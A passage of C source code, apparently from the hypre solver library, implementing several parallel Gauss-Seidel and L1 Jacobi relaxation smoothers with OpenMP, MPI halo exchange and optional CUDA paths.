tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,res0,res2,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
case 7: /* Jacobi (uses ParMatvec) */
{
/*-----------------------------------------------------------------
* Copy f into temporary vector.
*-----------------------------------------------------------------*/
hypre_SeqVectorPrefetch(hypre_ParVectorLocalVector(Vtemp), HYPRE_MEMORY_DEVICE);
hypre_SeqVectorPrefetch(hypre_ParVectorLocalVector(f), HYPRE_MEMORY_DEVICE);
hypre_ParVectorCopy(f, Vtemp);
/*-----------------------------------------------------------------
* Perform Matvec Vtemp=f-Au
*-----------------------------------------------------------------*/
hypre_ParCSRMatrixMatvec(-relax_weight,A, u, relax_weight, Vtemp);
#if defined(HYPRE_USING_CUDA)
hypreDevice_IVAXPY(n, l1_norms, Vtemp_data, u_data);
#else
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
u_data[i] += Vtemp_data[i] / l1_norms[i];
}
#endif
}
break;
case 8: /* hybrid L1 Symm. Gauss-Seidel */
{
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
{
v_buf_data[index++] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
{
res -= A_diag_data[jj] * tmp_data[ii];
}
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
{
res -= A_diag_data[jj] * tmp_data[ii];
}
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
{
res -= A_diag_data[jj] * tmp_data[ii];
}
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] += res / l1_norms[i];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 + one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( l1_norms[i] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points && l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res2 += A_diag_data[jj] * Vtemp_data[ii];
res0 -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& l1_norms[i] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / l1_norms[i];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / l1_norms[i];*/
}
}
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
/* Hybrid: Jacobi off-processor, ordered Gauss-Seidel on-processor */
case 10:
{
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
#ifdef HYPRE_USING_PERSISTENT_COMM
// JSP: persistent comm can be similarly used for other smoothers
hypre_ParCSRPersistentCommHandle *persistent_comm_handle;
#endif
if (num_procs > 1)
{
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PACK_UNPACK] -= hypre_MPI_Wtime();
#endif
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
#ifdef HYPRE_USING_PERSISTENT_COMM
persistent_comm_handle = hypre_ParCSRCommPkgGetPersistentCommHandle(1, comm_pkg);
v_buf_data = (HYPRE_Real *) hypre_ParCSRCommHandleSendDataBuffer(persistent_comm_handle);
Vext_data = (HYPRE_Real *) hypre_ParCSRCommHandleRecvDataBuffer(persistent_comm_handle);
#else
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
#endif
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
HYPRE_Int begin = hypre_ParCSRCommPkgSendMapStart(comm_pkg, 0);
HYPRE_Int end = hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for HYPRE_SMP_SCHEDULE
#endif
for (i = begin; i < end; i++)
{
v_buf_data[i - begin]
= u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,i)];
}
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PACK_UNPACK] += hypre_MPI_Wtime();
hypre_profile_times[HYPRE_TIMER_ID_HALO_EXCHANGE] -= hypre_MPI_Wtime();
#endif
#ifdef HYPRE_USING_PERSISTENT_COMM
hypre_ParCSRPersistentCommHandleStart(persistent_comm_handle, HYPRE_MEMORY_HOST, v_buf_data);
#else
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
#endif
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
#ifdef HYPRE_USING_PERSISTENT_COMM
hypre_ParCSRPersistentCommHandleWait(persistent_comm_handle, HYPRE_MEMORY_HOST, Vext_data);
#else
hypre_ParCSRCommHandleDestroy(comm_handle);
#endif
comm_handle = NULL;
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_HALO_EXCHANGE] += hypre_MPI_Wtime();
#endif
}
// Check for ordering of matrix. If stored, get pointer, otherwise
// compute ordering and point matrix variable to array.
HYPRE_Int *proc_ordering;
if (!hypre_ParCSRMatrixProcOrdering(A)) {
proc_ordering = hypre_CTAlloc(HYPRE_Int, n, HYPRE_MEMORY_HOST);
hypre_topo_sort(A_diag_i, A_diag_j, A_diag_data, proc_ordering, n);
hypre_ParCSRMatrixProcOrdering(A) = proc_ordering;
}
else {
proc_ordering = hypre_ParCSRMatrixProcOrdering(A);
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_RELAX] -= hypre_MPI_Wtime();
#endif
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
HYPRE_Int row = proc_ordering[i];
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point row; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[row]] != zero)
{
res = f_data[row];
for (jj = A_diag_i[row]+1; jj < A_diag_i[row+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[row]; jj < A_offd_i[row+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[row] = res / A_diag_data[A_diag_i[row]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
HYPRE_Int row = proc_ordering[i];
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[row]] != zero)
{
res = f_data[row];
for (jj = A_diag_i[row]+1; jj < A_diag_i[row+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[row]; jj < A_offd_i[row+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[row] = res / A_diag_data[A_diag_i[row]];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
HYPRE_Int row = proc_ordering[i];
/*-----------------------------------------------------------
* If row is of the right type ( C or F ) and diagonal is
* nonzero, relax point row; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[row] == relax_points
&& A_diag_data[A_diag_i[row]] != zero)
{
res = f_data[row];
for (jj = A_diag_i[row]+1; jj < A_diag_i[row+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[row]; jj < A_offd_i[row+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
